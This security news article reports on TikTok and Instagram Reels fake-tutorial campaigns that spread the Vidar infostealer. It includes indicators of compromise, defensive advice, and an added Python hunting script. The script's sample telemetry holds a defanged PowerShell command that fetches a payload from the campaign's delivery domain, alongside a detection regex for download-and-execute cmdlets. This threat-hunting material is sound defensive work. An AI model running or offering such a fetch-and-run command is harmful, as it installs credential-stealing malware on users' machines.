Hackers Use TikTok and Instagram Reels to Spread Vidar Malware Through Fake Free Software Tutorials


Hackers are using TikTok and Instagram Reels videos to push malware through fake tutorials that promise free access to paid software, including Spotify Premium and other popular tools.

The campaigns were detailed by ReversingLabs, which found two social media tactics designed to move users from short videos to malicious downloads or unsafe third-party websites.

The confirmed malware in one campaign is Vidarstealer, also known as Vidar. It is an information-stealing malware family that can collect passwords, financial details, authentication tokens, and other sensitive data from infected Windows devices.

Fake Windows-style accounts push malicious PowerShell commands

The first campaign uses accounts that look like Windows support or technology tip pages. Some profiles used names such as windows.tips and windows.insights, along with blue and white profile images that resemble Microsoft-style branding.

The videos appear polished, with clean graphics and voiceovers that walk viewers through steps to unlock premium software for free. In one example covered by Help Net Security, viewers were told to open PowerShell and run a command that supposedly unlocked Spotify Premium.

That command did not provide a legitimate subscription. It downloaded a file identified as Vidarstealer from a remote domain, turning a short social media tutorial into a malware installation path.

| Campaign detail | What researchers found |
| --- | --- |
| Platforms used | TikTok and Instagram Reels |
| Main lure | Free Spotify Premium and other paid software |
| Confirmed malware | Vidarstealer |
| Common tactic | Fake tutorials that tell users to run commands or visit download sites |
| Confirmed delivery path | PowerShell command using a remote download address |
| Audience signal | Some videos reached more than 100,000 views |

Attackers use engagement to make scams look trustworthy

These videos can look more credible because they collect views, saves, likes, comments, and shares. For many users, that visible engagement works like a trust signal, even when the content comes from an unknown account.

Malwarebytes noted that short-form video platforms have become a new way for cybercriminals to spread infostealers, with videos telling users to run dangerous commands or visit malicious download pages.

ReversingLabs found one lure video with more than 109,000 views, 1,699 saves, 1,581 likes, and 974 shares. Saves and shares matter because they can help a post reach more people through recommendation systems.

  • Fake accounts copy the look of trusted technology pages.
  • Videos use voiceovers and simple instructions to appear helpful.
  • Attackers promise free access to paid software.
  • PowerShell commands hide the real download activity from non-technical users.
  • High engagement makes malicious content look more credible.

A second campaign builds curiosity before sending users to download sites

The second campaign uses a more casual style. Instead of giving instructions immediately, attackers post short videos showing premium features in apps such as Spotify, then encourage viewers to comment or ask how the user got access.

After viewers engage, the account may reply with instructions, send a direct message, point users to another tutorial, or send them to a link in the profile. Some of those sites claimed to offer free premium games, AI tools, Spotify Premium, CapCut Pro, and YouTube Premium.

Researchers saw domains such as pluginchad[.]xyz, maxapk[.]xyz, and d4ug[.]site tied to the campaign. Some sites were already offline during analysis, while survey-gated pages prevented researchers from confirming every final payload.

| Method | How it works | Main risk |
| --- | --- | --- |
| Fake tutorial video | User follows a step-by-step command shown in a short video | Direct malware download and execution |
| Comment bait | User comments to ask how premium features were unlocked | Attacker replies with unsafe instructions or links |
| Profile link funnel | Account sends users to a download site outside the platform | Fake installers, surveys, redirects, or malware |

Vidar has been active for years and is commonly sold as malware-as-a-service. It can steal browser data, credentials, cookies, tokens, cryptocurrency wallet data, and other files that help attackers hijack accounts or commit fraud.

According to Trend Micro, earlier TikTok campaigns used videos to lure users into running PowerShell commands that delivered Vidar and StealC infostealers. That earlier research shows that social video malware delivery has been developing for some time, not appearing as a one-off tactic.

[Image: a lure video showing 1,699 saves, 1,581 likes, and 974 shares, with over 109,000 total views]

The new campaign follows the same broader pattern. Attackers go where users already spend time, then turn everyday tutorial behavior into a malware delivery method.

Why TikTok and Instagram scams are hard to stop

Social media scams are difficult to remove quickly because the harmful instruction may appear inside the video rather than in a file that security tools can scan. A platform may see a short tutorial, while the user sees a command they later run on their own device.

The Help Net Security report also noted that users who warn others in comments can be blocked, while attackers can delete warning comments from their own posts.

ReversingLabs said attempts to report some Instagram posts as scams were rejected. Even when a malicious account disappears, attackers can create new accounts and repost similar videos with little effort.

What users and companies should do

Users should never run PowerShell, Command Prompt, Windows Run, or terminal commands copied from a social media video. Legitimate software vendors do not ask users to unlock paid features by pasting scripts from short videos.

Malwarebytes recommends downloading software only from official vendor websites, avoiding cracked or unofficial versions of paid apps, and verifying files before running them.

Organizations should also update employee training. Social media now belongs in phishing awareness programs, especially for workers who use personal devices near work accounts or install software on company-managed systems.

  • Block known malicious domains and hashes from this campaign.
  • Limit who can install software on work devices.
  • Monitor for suspicious PowerShell commands launched after browser activity.
  • Warn users not to run commands from TikTok, Instagram, YouTube Shorts, or similar videos.
  • Review endpoint alerts for unexpected downloads named build.exe.
  • Train employees to report suspicious social media instructions, not just suspicious emails.

Indicators of compromise

Security teams can use the following indicators as a starting point for threat hunting. Some domains may already be offline, but related infrastructure and copied campaign templates can continue to appear.

| Type | Indicator | Description |
| --- | --- | --- |
| SHA-256 | 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153 | Hash of build.exe, identified as Vidarstealer |
| Domain | pluginchad[.]xyz | Fake free software download site |
| Domain | maxapk[.]xyz | Fake free software download site |
| Domain | d4ug[.]site | Site claiming to unlock premium games and AI tools |
| Domain | slmgr[.]sh | Domain connected to malicious command delivery |
| Domain | msget[.]run | Domain used in the malicious PowerShell delivery path |
| Account | tiktok[.]com/@windows.tips1 | Malicious TikTok account tied to the tutorial campaign |
| Account | tiktok[.]com/@windows.insight | Malicious TikTok account tied to the tutorial campaign |
| Account | tiktok[.]com/@davidcooksey47 | Account associated with the campaign |
| Account | tiktok[.]com/@tracyhughe | Account associated with the campaign |
| Account | tiktok[.]com/@mr.capcut.pro2 | Account associated with the campaign |
| Account | instagram[.]com/wtips404 | Instagram account tied to the campaign |
| Account | instagram[.]com/wndwstips | Instagram account tied to the campaign |
| Account | instagram[.]com/epemberton369 | Instagram account tied to the campaign |
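As an added hunting example (not code from the article or from ReversingLabs), the Python script below applies the IoC table above together with the earlier advice to watch for PowerShell launched after browser activity, running both checks over constructed process-creation events. The event schema, the browser list and the 10-minute correlation window are assumptions.

```python
# Added hunting example (not from the article): correlate constructed process-creation
# events with the article's IoC list and its "PowerShell after browser activity" advice.
import re
from datetime import datetime, timedelta

# Indicators copied from the article's IoC table, kept defanged as published.
IOC_DOMAINS = {"pluginchad[.]xyz", "maxapk[.]xyz", "d4ug[.]site", "slmgr[.]sh", "msget[.]run"}
IOC_SHA256 = {"03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}  # assumed browser set
WINDOW = timedelta(minutes=10)  # assumed correlation window; tune per environment
# PowerShell cmdlets and aliases that fetch or evaluate remote content.
FETCH_OR_EVAL = re.compile(r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring)\b", re.I)

def refang(text):
    """Normalise defanged IoC notation so it matches live log content."""
    return text.replace("[.]", ".").replace("hxxp", "http")

LIVE_DOMAINS = {refang(d) for d in IOC_DOMAINS}

def hunt(events):
    """Return (timestamp, reasons) for each matching event. An event is a dict with
    ts (ISO 8601), host, image, command_line and optional sha256 (assumed schema)."""
    last_browser, findings = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, image = datetime.fromisoformat(ev["ts"]), ev.get("image", "").lower().rsplit("\\", 1)[-1]
        cmd, reasons = refang(ev.get("command_line", "")).lower(), []
        if image in BROWSERS:
            last_browser[ev["host"]] = ts  # remember the most recent browsing per host
            continue
        if image == "powershell.exe":
            recent = ev["host"] in last_browser and ts - last_browser[ev["host"]] <= WINDOW
            if recent and FETCH_OR_EVAL.search(cmd):
                reasons.append("remote fetch/eval in PowerShell shortly after browser activity")
            if hits := sorted(d for d in LIVE_DOMAINS if d in cmd):
                reasons.append("IoC domain in command line: " + ", ".join(hits))
        if ev.get("sha256", "").lower() in IOC_SHA256:
            reasons.append("SHA-256 matches build.exe (Vidarstealer)")
        elif image == "build.exe":
            reasons.append("unexpected build.exe execution, hash not in IoC list")
        if reasons:
            findings.append((ev["ts"], reasons))
    return findings

# Constructed sample telemetry (not real campaign data): browse, PowerShell fetch, then build.exe.
SAMPLE = [
    {"ts": "2025-01-01T10:00:00", "host": "ws1", "image": r"C:\Program Files\Google\Chrome\chrome.exe", "command_line": "chrome.exe"},
    {"ts": "2025-01-01T10:03:00", "host": "ws1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell -c iwr hxxps://msget[.]run/spotify"},
    {"ts": "2025-01-01T10:04:00", "host": "ws1", "image": r"C:\Users\a\AppData\Local\Temp\build.exe", "command_line": "build.exe", "sha256": "03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153"},
    {"ts": "2025-01-01T12:00:00", "host": "ws2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell Get-Process"},
]
```

Calling `hunt(SAMPLE)` returns two findings: the PowerShell event on ws1 (both the browser-proximity rule and the msget[.]run domain fire) and the build.exe event by hash; the unrelated PowerShell on ws2 is not flagged.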

Short videos have become a malware delivery channel

The rise of these campaigns shows that phishing no longer belongs only to email, text messages, or fake login pages. A short video can now deliver the social engineering, the instructions, and the credibility signal in under a minute.

ReversingLabs researchers said attackers can delete warning comments, block users who call out the scam, and keep reposting content across accounts and platforms.

The broader trend also matches Trend Micro’s TikTok infostealer research, which warned that social video platforms give attackers algorithmic reach without needing to host malicious code directly on the platform.

For users, the rule is simple: free premium software tutorials that require copied commands, unofficial installers, or survey-gated downloads should be treated as suspicious. For companies, the response should combine technical controls, endpoint monitoring, and training that covers social media as a real attack surface.

FAQ

How are hackers using TikTok and Instagram Reels to spread malware?

Hackers post short videos that promise free access to paid software, then direct viewers to run PowerShell commands or visit third-party download sites. In one confirmed case, the command downloaded Vidarstealer malware.

What malware is used in the fake free software tutorial campaign?

Researchers confirmed Vidarstealer in one delivery path. Vidar is an information-stealing malware family that can steal credentials, financial information, authentication tokens, cookies, and other sensitive data from infected devices.

Why do these fake tutorial videos work?

The videos look like normal tech tips, use polished graphics or voiceovers, and gain credibility through views, likes, saves, shares, and comments. Some accounts also mimic Windows-style support branding to appear legitimate.

Were all fake download sites confirmed to deliver Vidar malware?

No. ReversingLabs confirmed Vidarstealer from the msget[.]run/spotify delivery path. Researchers could not confirm the final payload from some survey-gated fake download sites, although those sites still posed a clear risk.

How can users avoid malware from social media tutorials?

Users should avoid running commands copied from TikTok, Instagram Reels, or other short videos, download software only from official websites, avoid cracked or free premium app offers, and report suspicious accounts or posts.
